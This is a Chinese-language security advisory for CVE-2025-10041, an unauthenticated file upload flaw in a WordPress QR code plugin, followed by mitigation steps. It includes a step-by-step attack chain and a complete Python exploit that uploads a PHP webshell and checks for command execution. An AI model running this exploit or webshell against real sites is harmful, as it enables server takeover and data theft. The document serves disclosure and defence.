CVE-2025-10041：WordPress Flex QR Code Generator插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-10041

漏洞类型

任意文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Flex QR Code Generator插件

漏洞概述

CVE-2025-10041是WordPress平台上一款名为Flex QR Code Generator的插件中存在的高危安全漏洞。该插件是一款用于在WordPress网站中生成二维码的工具，安装量较大。漏洞存在于插件的save_qr_code_to_db()函数中，由于缺乏对上传文件类型的有效验证，攻击者可以利用该漏洞上传任意类型的文件到目标服务器。由于此漏洞无需任何身份认证即可利用，且CVSS评分高达9.8分，被评定为严重级别。

该漏洞的危害程度极高，攻击者可以通过上传恶意文件（如WebShell）实现远程代码执行（RCE），从而完全控制受影响的WordPress网站。一旦网站被攻陷，攻击者可以窃取敏感数据、植入后门、进行挖矿活动、将恶意软件分发给访问者，甚至利用受感染服务器作为跳板攻击其他系统。考虑到该漏洞的利用门槛极低（无需认证），且影响所有1.2.5及以下版本，使用此插件的网站管理员应立即采取行动进行修复。

该漏洞由Wordfence安全团队的安全研究员发现并报告，披露日期为2025年10月15日。作为WordPress生态系统中常见的漏洞类型之一，任意文件上传漏洞一直是黑客攻击WordPress网站的主要途径之一，本漏洞再次凸显了第三方插件对WordPress网站安全的重要性。

技术细节

Flex QR Code Generator插件的save_qr_code_to_db()函数负责处理用户上传的二维码图像并将其保存到数据库中。然而，该函数在处理文件上传时存在严重的安全缺陷：

1. **缺失文件类型验证**：函数没有对上传文件的MIME类型、文件扩展名或文件内容进行充分验证，仅依赖客户端提供的Content-Type头信息。

2. **未限制文件扩展名**：攻击者可以上传.php、.phtml、.jsp等可执行脚本文件，这些文件将被保存在WordPress的uploads目录或插件特定目录中。

3. **未进行身份认证检查**：相关函数或调用入口未要求用户登录或具备特定权限，未认证的攻击者可以通过直接构造HTTP请求触发漏洞。

**利用方式**：

攻击者可以通过以下步骤利用此漏洞：
1. 定位目标网站中Flex QR Code Generator插件的REST API端点或AJAX处理接口（通常为wp-admin/admin-ajax.php或自定义REST路由）。
2. 构造包含恶意PHP代码的请求包，将文件扩展名伪装为图像格式（如.jpg或.png），但实际包含PHP代码。
3. 通过multipart/form-data方式上传文件，绕过客户端验证。
4. 服务器接收文件后将其保存到可访问的Web目录中。
5. 攻击者通过浏览器访问上传的恶意文件URL，触发其中的PHP代码执行，实现远程代码执行。

由于漏洞利用无需认证且复杂度低，攻击者可以编写自动化脚本批量扫描和攻击暴露在互联网上的WordPress网站。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者使用自动化工具（如WPScan）扫描互联网上的WordPress网站，识别安装了Flex QR Code Generator插件（版本<=1.2.5）的目标。

STEP 2

步骤2：定位上传接口

攻击者通过分析插件源码或直接探测，找到处理QR码上传的AJAX端点（admin-ajax.php）或REST API路由，该接口调用存在漏洞的save_qr_code_to_db()函数。

STEP 3

步骤3：构造恶意文件

攻击者创建一个包含PHP WebShell代码的文件，使用GIF89a文件头进行伪装，使文件看起来像是合法的GIF图像，以绕过简单的文件类型检查。

STEP 4

步骤4：上传恶意文件

攻击者通过multipart/form-data格式发送POST请求，将恶意文件上传到目标服务器。由于无需认证，此请求可以直接从外部发起。

STEP 5

步骤5：执行远程代码

服务器接收并保存上传的文件到Web可访问目录。攻击者通过浏览器或curl访问上传的PHP文件URL，传入命令参数触发代码执行，实现对服务器的控制。

STEP 6

步骤6：权限提升与持久化

获得初始访问权限后，攻击者可以创建管理员账户、植入WebShell后门、修改网站内容、窃取数据库中的敏感信息（如用户凭证），并建立持久化访问机制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10041 - Flex QR Code Generator Arbitrary File Upload PoC
# Description: Exploits missing file type validation in save_qr_code_to_db() function
# Target: WordPress sites with Flex QR Code Generator plugin <= 1.2.5

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Malicious PHP payload disguised as an image file
# The GIF89a header helps bypass naive content-type checks
PAYLOAD = b"GIF89a;\n<?php system($_GET['cmd']); ?>"

def exploit():
    # Endpoint for QR code generation/upload functionality
    upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Prepare the malicious file
    files = {
        'qr_code_image': ('shell.php', PAYLOAD, 'image/gif'),
    }

    # Data parameters expected by the save_qr_code_to_db() function
    data = {
        'action': 'save_qr_code',
        'qr_code_name': 'malicious_qr',
    }

    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Uploading malicious file...")

    # Send the unauthenticated upload request
    response = requests.post(upload_url, files=files, data=data, timeout=30)

    if response.status_code == 200:
        print(f"[+] Upload request sent successfully")
        print(f"[+] Response: {response.text[:500]}")
        # Attempt to access the uploaded shell
        # The shell is typically saved in /wp-content/uploads/ directory
        shell_urls = [
            f"{TARGET_URL}/wp-content/uploads/qr-codes/shell.php?cmd=id",
            f"{TARGET_URL}/wp-content/uploads/2025/shell.php?cmd=id",
            f"{TARGET_URL}/wp-content/uploads/shell.php?cmd=id",
        ]

        for shell_url in shell_urls:
            print(f"[*] Trying: {shell_url}")
            shell_response = requests.get(shell_url, timeout=10)
            if shell_response.status_code == 200 and "uid=" in shell_response.text:
                print(f"[+] RCE CONFIRMED!")
                print(f"[+] Output: {shell_response.text}")
                return True

    print("[-] Exploit may have failed or shell location differs")
    return False

if __name__ == "__main__":
    exploit()

影响范围

Flex QR Code Generator <= 1.2.5

防御指南

临时缓解措施

在等待官方补丁或无法立即升级的情况下，建议采取以下临时缓解措施：1）立即禁用Flex QR Code Generator插件；2）通过.htaccess文件限制WordPress上传目录的PHP执行权限（在uploads目录下创建.htaccess文件，添加`php_flag engine off`配置）；3）部署Web应用防火墙（WAF）规则，过滤可疑的文件上传请求；4）监控服务器日志，查找异常的multipart POST请求和新建的PHP文件；5）检查现有uploads目录中是否存在可疑的PHP文件，特别是最近创建的.php、.phtml等可执行文件；6）如已遭受攻击，应立即清理后门、修改所有管理员密码、检查数据库中的可疑管理员账户。